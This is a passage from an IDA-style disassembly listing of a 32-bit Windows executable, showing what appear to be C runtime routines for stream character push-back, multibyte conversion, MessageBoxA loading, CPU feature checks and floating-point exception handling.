arg_0		= dword	ptr  4

		cmp	dword_428900, 0
		jnz	short loc_40F851
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 8
		retn
; ---------------------------------------------------------------------------

loc_40F851:				; CODE XREF: sub_40F836+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F7E7
		pop	ecx
		pop	ecx
		retn
sub_40F836	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F85F	proc near		; CODE XREF: sub_409427+15Ep
					; sub_409427+5BEp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_4]
		or	ebp, 0FFFFFFFFh
		test	byte ptr [esi+0Ch], 40h
		push	edi
		jnz	loc_40F91C
		push	esi
		call	sub_408FE0
		cmp	eax, ebp
		pop	ecx
		mov	ebx, offset dword_424BD0
		jz	short loc_40F8B2
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F8B2
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F8B4
; ---------------------------------------------------------------------------

loc_40F8B2:				; CODE XREF: sub_40F85F+23j
					; sub_40F85F+2Fj
		mov	eax, ebx

loc_40F8B4:				; CODE XREF: sub_40F85F+51j
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40F8FB
		push	esi
		call	sub_408FE0
		cmp	eax, ebp
		pop	ecx
		jz	short loc_40F8F3
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F8F3
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F8F5
; ---------------------------------------------------------------------------

loc_40F8F3:				; CODE XREF: sub_40F85F+64j
					; sub_40F85F+70j
		mov	eax, ebx

loc_40F8F5:				; CODE XREF: sub_40F85F+92j
		test	byte ptr [eax+24h], 80h
		jz	short loc_40F91C

loc_40F8FB:				; CODE XREF: sub_40F85F+59j
		call	sub_405D93
		xor	edi, edi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h

loc_40F915:				; CODE XREF: sub_40F85F+C3j
					; sub_40F85F+CEj ...
		mov	eax, ebp

loc_40F917:				; CODE XREF: sub_40F85F+11Cj
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40F91C:				; CODE XREF: sub_40F85F+Fj
					; sub_40F85F+9Aj
		mov	ebx, [esp+10h+arg_0]
		cmp	ebx, ebp
		jz	short loc_40F915
		mov	eax, [esi+0Ch]
		test	al, 1
		jnz	short loc_40F933
		test	al, al
		jns	short loc_40F915
		test	al, 2
		jnz	short loc_40F915

loc_40F933:				; CODE XREF: sub_40F85F+CAj
		xor	edi, edi
		cmp	[esi+8], edi
		jnz	short loc_40F941
		push	esi
		call	sub_40DABC
		pop	ecx

loc_40F941:				; CODE XREF: sub_40F85F+D9j
		mov	eax, [esi]
		cmp	eax, [esi+8]
		jnz	short loc_40F950
		cmp	[esi+4], edi
		jnz	short loc_40F915
		inc	eax
		mov	[esi], eax

loc_40F950:				; CODE XREF: sub_40F85F+E7j
		dec	dword ptr [esi]
		test	byte ptr [esi+0Ch], 40h
		mov	eax, [esi]
		jz	short loc_40F963
		cmp	[eax], bl
		jz	short loc_40F965
		inc	eax
		mov	[esi], eax
		jmp	short loc_40F915
; ---------------------------------------------------------------------------

loc_40F963:				; CODE XREF: sub_40F85F+F9j
		mov	[eax], bl

loc_40F965:				; CODE XREF: sub_40F85F+FDj
		mov	eax, [esi+0Ch]
		inc	dword ptr [esi+4]
		and	eax, 0FFFFFFEFh
		or	eax, 1
		mov	[esi+0Ch], eax
		mov	eax, ebx
		and	eax, 0FFh
		jmp	short loc_40F917
sub_40F85F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F97D	proc near		; CODE XREF: sub_409427+6FFp
					; sub_40FA90+Ep

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		jz	short loc_40F9A1
		cmp	[ebp+arg_8], ebx
		jz	short loc_40F9A1
		cmp	[esi], bl
		jnz	short loc_40F9A7
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F9A1
		mov	[eax], bx

loc_40F9A1:				; CODE XREF: sub_40F97D+Fj
					; sub_40F97D+14j ...
		xor	eax, eax

loc_40F9A3:				; CODE XREF: sub_40F97D+5Aj
					; sub_40F97D+BBj ...
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40F9A7:				; CODE XREF: sub_40F97D+18j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_40F9D9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F9C8
		movzx	cx, byte ptr [esi]
		mov	[eax], cx

loc_40F9C8:				; CODE XREF: sub_40F97D+42j
					; sub_40F97D+10Bj
		cmp	[ebp+var_4], bl
		jz	short loc_40F9D4
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F9D4:				; CODE XREF: sub_40F97D+4Ej
		xor	eax, eax
		inc	eax
		jmp	short loc_40F9A3
; ---------------------------------------------------------------------------

loc_40F9D9:				; CODE XREF: sub_40F97D+3Bj
		lea	eax, [ebp+var_10]
		push	eax
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40FA69
		mov	eax, [ebp+var_10]
		mov	ecx, [eax+0ACh]
		cmp	ecx, 1
		jle	short loc_40FA1F
		cmp	[ebp+arg_8], ecx
		jl	short loc_40FA1F
		xor	edx, edx
		cmp	[ebp+arg_0], ebx
		setnz	dl
		push	edx
		push	[ebp+arg_0]
		push	ecx
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		mov	eax, [ebp+var_10]
		jnz	short loc_40FA2F

loc_40FA1F:				; CODE XREF: sub_40F97D+7Bj
					; sub_40F97D+80j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, [eax+0ACh]
		jb	short loc_40FA4A
		cmp	[esi+1], bl
		jz	short loc_40FA4A

loc_40FA2F:				; CODE XREF: sub_40F97D+A0j
		cmp	[ebp+var_4], bl
		mov	eax, [eax+0ACh]
		jz	loc_40F9A3
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40F9A3
; ---------------------------------------------------------------------------

loc_40FA4A:				; CODE XREF: sub_40F97D+ABj
					; sub_40F97D+B0j ...
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		cmp	[ebp+var_4], bl
		jz	short loc_40FA61
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40FA61:				; CODE XREF: sub_40F97D+DBj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F9A3
; ---------------------------------------------------------------------------

loc_40FA69:				; CODE XREF: sub_40F97D+6Dj
		xor	eax, eax
		cmp	[ebp+arg_0], ebx
		setnz	al
		push	eax
		push	[ebp+arg_0]
		mov	eax, [ebp+var_10]
		push	1
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		jnz	loc_40F9C8
		jmp	short loc_40FA4A
sub_40F97D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FA90	proc near		; CODE XREF: sub_40D41A+18Ep
					; sub_40D41A+1BCp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40F97D
		add	esp, 10h
		retn
sub_40FA90	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40FAB0	proc near		; CODE XREF: sub_409427+9CFp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_4]
		mov	ecx, [esp+arg_C]
		or	ecx, eax
		mov	ecx, [esp+arg_8]
		jnz	short loc_40FAC9
		mov	eax, [esp+arg_0]
		mul	ecx
		retn	10h
; ---------------------------------------------------------------------------

loc_40FAC9:				; CODE XREF: sub_40FAB0+Ej
		push	ebx
		mul	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	[esp+4+arg_C]
		add	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	ecx
		add	edx, ebx
		pop	ebx
		retn	10h
sub_40FAB0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FAE4	proc near		; CODE XREF: sub_40A074+15Dp

var_30		= dword	ptr -30h
var_20		= byte ptr -20h
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		push	esi
		push	edi
		call	sub_40574A
		xor	ebx, ebx
		cmp	dword_428FA8, ebx
		mov	[ebp+var_10], eax
		mov	[ebp+var_4], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_C], ebx
		jnz	loc_40FBB9
		push	offset aUser32_dll_0 ; "USER32.DLL"
		call	ds:off_41E0E4
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_40FB24

loc_40FB1D:				; CODE XREF: sub_40FAE4+50j
		xor	eax, eax
		jmp	loc_40FC7D
; ---------------------------------------------------------------------------

loc_40FB24:				; CODE XREF: sub_40FAE4+37j
		mov	esi, ds:off_41E0E8
		push	offset aMessageboxa ; "MessageBoxA"
		push	edi
		call	esi ; sub_45000F
		cmp	eax, ebx
		jz	short loc_40FB1D
		push	eax
		call	sub_4056E7
		mov	[esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
		push	edi
		mov	dword_428FA8, eax
		call	esi ; sub_45000F
		push	eax
		call	sub_4056E7
		mov	[esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
		push	edi
		mov	dword_428FAC, eax
		call	esi ; sub_45000F
		push	eax
		call	sub_4056E7
		mov	dword_428FB0, eax
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40FB87
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40FB87:				; CODE XREF: sub_40FAE4+94j
		cmp	[ebp+var_8], 2
		jnz	short loc_40FBB9
		push	offset aGetuserobjecti ; "GetUserObjectInformationA"
		push	edi
		call	esi ; sub_45000F
		push	eax
		call	sub_4056E7
		cmp	eax, ebx
		pop	ecx
		mov	dword_428FB8, eax
		jz	short loc_40FBB9
		push	offset aGetprocesswind ; "GetProcessWindowStation"
		push	edi
		call	esi ; sub_45000F
		push	eax
		call	sub_4056E7
		pop	ecx
		mov	dword_428FB4, eax

loc_40FBB9:				; CODE XREF: sub_40FAE4+22j
					; sub_40FAE4+A7j ...
		mov	eax, dword_428FB4
		mov	esi, [ebp+var_10]
		cmp	eax, esi
		jz	short loc_40FC32
		cmp	dword_428FB8, esi
		jz	short loc_40FC32
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		cmp	eax, ebx
		jz	short loc_40FBFF
		lea	ecx, [ebp+var_14]
		push	ecx
		push	0Ch
		lea	ecx, [ebp+var_20]
		push	ecx
		push	1
		push	eax
		push	dword_428FB8
		call	sub_405753
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_40FBFF
		test	[ebp+var_18], 1
		jnz	short loc_40FC32

loc_40FBFF:				; CODE XREF: sub_40FAE4+F4j
					; sub_40FAE4+113j
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_407EFD
		test	eax, eax
		pop	ecx
		jz	short loc_40FC1A
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40FC1A:				; CODE XREF: sub_40FAE4+127j
		cmp	[ebp+var_C], 4
		jb	short loc_40FC29
		or	[ebp+arg_8], 200000h
		jmp	short loc_40FC63
; ---------------------------------------------------------------------------

loc_40FC29:				; CODE XREF: sub_40FAE4+13Aj
		or	[ebp+arg_8], 40000h
		jmp	short loc_40FC63
; ---------------------------------------------------------------------------

loc_40FC32:				; CODE XREF: sub_40FAE4+DFj
					; sub_40FAE4+E7j ...
		mov	eax, dword_428FAC
		cmp	eax, esi
		jz	short loc_40FC63
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		cmp	eax, ebx
		mov	[ebp+var_4], eax
		jz	short loc_40FC63
		mov	eax, dword_428FB0
		cmp	eax, esi
		jz	short loc_40FC63
		push	[ebp+var_4]
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		mov	[ebp+var_4], eax

loc_40FC63:				; CODE XREF: sub_40FAE4+143j
					; sub_40FAE4+14Cj ...
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+var_4]
		push	dword_428FA8
		call	sub_405753
		pop	ecx
		call	eax

loc_40FC7D:				; CODE XREF: sub_40FAE4+3Bj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40FAE4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FC82	proc near		; CODE XREF: sub_40A074+27p
					; sub_40A074+38p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jl	short loc_40FCAB
		cmp	ecx, 2
		jle	short loc_40FC9E
		cmp	ecx, 3
		jnz	short loc_40FCAB
		mov	eax, dword_4285BC
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FC9E:				; CODE XREF: sub_40FC82+Ej
		mov	eax, dword_4285BC
		mov	dword_4285BC, ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FCAB:				; CODE XREF: sub_40FC82+9j
					; sub_40FC82+13j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
sub_40FC82	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FCC8	proc near		; CODE XREF: sub_410316+5Fp
					; DATA XREF: sub_40AC3F:loc_40AC81o
		xor	eax, eax
		retn
sub_40FCC8	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FCCB	proc near		; CODE XREF: sub_40FD2Bp
		mov	eax, offset sub_41190A
		mov	off_424F80, eax
		mov	off_424F84, offset sub_411006
		mov	off_424F88, offset sub_410FC4
		mov	off_424F8C, offset sub_410FF8
		mov	off_424F90, offset word_410F6E
		mov	off_424F94, eax
		mov	off_424F98, offset sub_411884
		mov	off_424F9C, offset sub_410F84
		mov	off_424FA0, offset sub_410EEE
		mov	off_424FA4, offset sub_410E7D
		retn
sub_40FCCB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FD2B	proc near		; CODE XREF: sub_407F39+1Cp
					; DATA XREF: zcrshv4o:off_41FDB4o

arg_0		= dword	ptr  4

		call	sub_40FCCB
		call	sub_411990
		cmp	[esp+arg_0], 0
		mov	dword_428FC0, eax
		jz	short loc_40FD46
		call	sub_41192B

loc_40FD46:				; CODE XREF: sub_40FD2B+14j
		fnclex
		retn
sub_40FD2B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FD49	proc near		; CODE XREF: sub_40FD99+4Dp

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_422E38
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		movapd	xmm0, xmm1
		mov	[ebp+var_1C], 1
		jmp	short loc_40FD89
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_40FD7E
		cmp	eax, 0C000001Dh
		jz	short loc_40FD7E
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40FD7E:				; CODE XREF: sub_40FD49+29j
					; sub_40FD49+30j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+var_1C], 0

loc_40FD89:				; CODE XREF: sub_40FD49+1Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40FD49	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FD99	proc near		; CODE XREF: sub_40AEEF+7p sub_40FDF9p

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		xor	eax, eax
		push	ebx
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		push	ebx
		pushf
		pop	eax
		mov	ecx, eax
		xor	eax, 200000h
		push	eax
		popf
		pushf
		pop	edx
		sub	edx, ecx
		jz	short loc_40FDDC
		push	ecx
		popf
		xor	eax, eax
		cpuid
		mov	[ebp+var_C], eax
		mov	[ebp+var_18], ebx
		mov	[ebp+var_14], edx
		mov	[ebp+var_10], ecx
		mov	eax, 1
		cpuid
		mov	[ebp+var_4], edx
		mov	[ebp+var_8], eax

loc_40FDDC:				; CODE XREF: sub_40FD99+22j
		pop	ebx
		test	[ebp+var_4], 4000000h
		jz	short loc_40FDF4
		call	sub_40FD49
		test	eax, eax
		jz	short loc_40FDF4
		xor	eax, eax
		inc	eax
		jmp	short loc_40FDF6
; ---------------------------------------------------------------------------

loc_40FDF4:				; CODE XREF: sub_40FD99+4Bj
					; sub_40FD99+54j
		xor	eax, eax

loc_40FDF6:				; CODE XREF: sub_40FD99+59j
		pop	ebx
		leave
		retn
sub_40FD99	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FDF9	proc near		; DATA XREF: zcrshv4o:0041E2F0o
		call	sub_40FD99
		mov	dword_437E9C, eax
		xor	eax, eax
		retn
sub_40FDF9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FE06	proc near		; CODE XREF: sub_410407+4Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	cl, byte ptr [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		xor	edi, edi
		mov	[eax+4], edi
		mov	eax, [ebp+arg_0]
		xor	ebx, ebx
		mov	[eax+8], edi
		mov	eax, [ebp+arg_0]
		inc	ebx
		test	cl, 10h
		mov	[eax+0Ch], edi
		jz	short loc_40FE38
		mov	eax, [ebp+arg_0]
		or	[eax+4], ebx
		mov	[ebp+arg_8], 0C000008Fh

loc_40FE38:				; CODE XREF: sub_40FE06+23j
		test	cl, 2
		jz	short loc_40FE4B
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 2
		mov	[ebp+arg_8], 0C0000093h

loc_40FE4B:				; CODE XREF: sub_40FE06+35j
		test	cl, bl
		jz	short loc_40FE5D
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 4
		mov	[ebp+arg_8], 0C0000091h

loc_40FE5D:				; CODE XREF: sub_40FE06+47j
		test	cl, 4
		jz	short loc_40FE70
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 8
		mov	[ebp+arg_8], 0C000008Eh

loc_40FE70:				; CODE XREF: sub_40FE06+5Aj
		test	cl, 8
		jz	short loc_40FE83
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 10h
		mov	[ebp+arg_8], 0C0000090h

loc_40FE83:				; CODE XREF: sub_40FE06+6Dj
		mov	esi, [ebp+arg_4]
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shl	ecx, 4
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 10h
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		add	ecx, ecx
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 8
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 1
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 4
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 3
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 2
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 5
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, ebx
		xor	[eax+8], ecx
		call	sub_410606
		test	al, bl
		jz	short loc_40FEF2
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 10h

loc_40FEF2:				; CODE XREF: sub_40FE06+E3j
		test	al, 4
		jz	short loc_40FEFD
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 8

loc_40FEFD:				; CODE XREF: sub_40FE06+EEj
		test	al, 8
		jz	short loc_40FF08
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 4

loc_40FF08:				; CODE XREF: sub_40FE06+F9j
		test	al, 10h
		jz	short loc_40FF13
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 2

loc_40FF13:				; CODE XREF: sub_40FE06+104j
		test	al, 20h
		jz	short loc_40FF1D
		mov	eax, [ebp+arg_0]
		or	[eax+0Ch], ebx

loc_40FF1D:				; CODE XREF: sub_40FE06+10Fj
		mov	eax, [esi]
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_40FF5D
		cmp	eax, 400h
		jz	short loc_40FF51
		cmp	eax, 800h
		jz	short loc_40FF42
		cmp	eax, ecx
		jnz	short loc_40FF63
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax], 3
		jmp	short loc_40FF63
; ---------------------------------------------------------------------------

loc_40FF42:				; CODE XREF: sub_40FE06+12Ej
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFEh
		or	ecx, 2

loc_40FF4D:				; CODE XREF: sub_40FE06+155j
		mov	[eax], ecx
		jmp	short loc_40FF63
; ---------------------------------------------------------------------------

loc_40FF51:				; CODE XREF: sub_40FE06+127j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFDh
		or	ecx, ebx
		jmp	short loc_40FF4D
; ---------------------------------------------------------------------------

loc_40FF5D:				; CODE XREF: sub_40FE06+120j
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFFCh

loc_40FF63:				; CODE XREF: sub_40FE06+132j
					; sub_40FE06+13Aj ...
		mov	eax, [esi]
		mov	ecx, 300h
		and	eax, ecx
		jz	short loc_40FF8E
		cmp	eax, 200h
		jz	short loc_40FF81
		cmp	eax, ecx
		jnz	short loc_40FF9B
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFE3h
		jmp	short loc_40FF9B
; ---------------------------------------------------------------------------

loc_40FF81:				; CODE XREF: sub_40FE06+16Dj
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFE7h
		or	ecx, 4
		jmp	short loc_40FF99
; ---------------------------------------------------------------------------

loc_40FF8E:				; CODE XREF: sub_40FE06+166j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFEBh
		or	ecx, 8

loc_40FF99:				; CODE XREF: sub_40FE06+186j
		mov	[eax], ecx

loc_40FF9B:				; CODE XREF: sub_40FE06+171j
					; sub_40FE06+179j
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+arg_C]
		shl	ecx, 5
		xor	ecx, [eax]
		and	ecx, 1FFE0h
		xor	[eax], ecx
		mov	eax, [ebp+arg_0]
		or	[eax+20h], ebx
		cmp	[ebp+arg_18], edi
		mov	eax, [ebp+arg_0]
		mov	edi, [ebp+arg_14]
		jz	short loc_40FFE5
		and	dword ptr [eax+20h], 0FFFFFFE1h
		mov	eax, [ebp+arg_10]
		fld	dword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax+60h], 0FFFFFFE1h
		fld	dword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+50h]
		jmp	short loc_410019
; ---------------------------------------------------------------------------

loc_40FFE5:				; CODE XREF: sub_40FE06+1B7j
		mov	ecx, [eax+20h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+20h], ecx
		mov	eax, [ebp+arg_10]
		fld	qword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax+60h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+60h], ecx
		fld	qword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+50h]

loc_410019:				; CODE XREF: sub_40FE06+1DDj
		call	sub_410611
		lea	eax, [ebp+arg_0]
		push	eax
		push	ebx
		push	0
		push	[ebp+arg_8]
		call	ds:off_41E1AC
		mov	ecx, [ebp+arg_0]
		test	byte ptr [ecx+8], 10h
		jz	short loc_41003A
		and	dword ptr [esi], 0FFFFFFFEh

loc_41003A:				; CODE XREF: sub_40FE06+22Fj
		test	byte ptr [ecx+8], 8
		jz	short loc_410043
		and	dword ptr [esi], 0FFFFFFFBh

loc_410043:				; CODE XREF: sub_40FE06+238j
		test	byte ptr [ecx+8], 4
		jz	short loc_41004C
		and	dword ptr [esi], 0FFFFFFF7h

loc_41004C:				; CODE XREF: sub_40FE06+241j
		test	byte ptr [ecx+8], 2
		jz	short loc_410055
		and	dword ptr [esi], 0FFFFFFEFh

loc_410055:				; CODE XREF: sub_40FE06+24Aj
		test	[ecx+8], bl
		jz	short loc_41005D
		and	dword ptr [esi], 0FFFFFFDFh

loc_41005D:				; CODE XREF: sub_40FE06+252j
		mov	eax, [ecx]
		and	eax, 3
		xor	ebx, ebx
		sub	eax, ebx
		mov	edx, 0FFFFF3FFh
		jz	short loc_41009C
		dec	eax
		jz	short loc_41008E
		dec	eax
		jz	short loc_41007E
		dec	eax
		jnz	short loc_41009E
		or	dword ptr [esi], 0C00h
		jmp	short loc_41009E
; ---------------------------------------------------------------------------

loc_41007E:				; CODE XREF: sub_40FE06+26Bj
		mov	eax, [esi]
		and	eax, 0FFFFFBFFh
		or	eax, 800h

loc_41008A:				; CODE XREF: sub_40FE06+294j
		mov	[esi], eax
		jmp	short loc_41009E
; ---------------------------------------------------------------------------

loc_41008E:				; CODE XREF: sub_40FE06+268j
		mov	eax, [esi]
		and	eax, 0FFFFF7FFh
		or	eax, 400h
		jmp	short loc_41008A
; ---------------------------------------------------------------------------

loc_41009C:				; CODE XREF: sub_40FE06+265j
		and	[esi], edx

loc_41009E:				; CODE XREF: sub_40FE06+26Ej
					; sub_40FE06+276j ...
		mov	eax, [ecx]
		shr	eax, 2
		and	eax, 7
		sub	eax, ebx
		jz	short loc_4100BF
		dec	eax
		jz	short loc_4100B4
		dec	eax
		jnz	short loc_4100CA
		and	[esi], edx
		jmp	short loc_4100CA
; ---------------------------------------------------------------------------

loc_4100B4:				; CODE XREF: sub_40FE06+2A5j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 200h
		jmp	short loc_4100C8
; ---------------------------------------------------------------------------

loc_4100BF:				; CODE XREF: sub_40FE06+2A2j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 300h

loc_4100C8:				; CODE XREF: sub_40FE06+2B7j
		mov	[esi], eax

loc_4100CA:				; CODE XREF: sub_40FE06+2A8j
					; sub_40FE06+2ACj
		cmp	[ebp+arg_18], ebx
		jz	short loc_4100D6
		fld	dword ptr [ecx+50h]
		fstp	dword ptr [edi]
		jmp	short loc_4100DB
; ---------------------------------------------------------------------------

loc_4100D6:				; CODE XREF: sub_40FE06+2C7j
		fld	qword ptr [ecx+50h]
		fstp	qword ptr [edi]

loc_4100DB:				; CODE XREF: sub_40FE06+2CEj
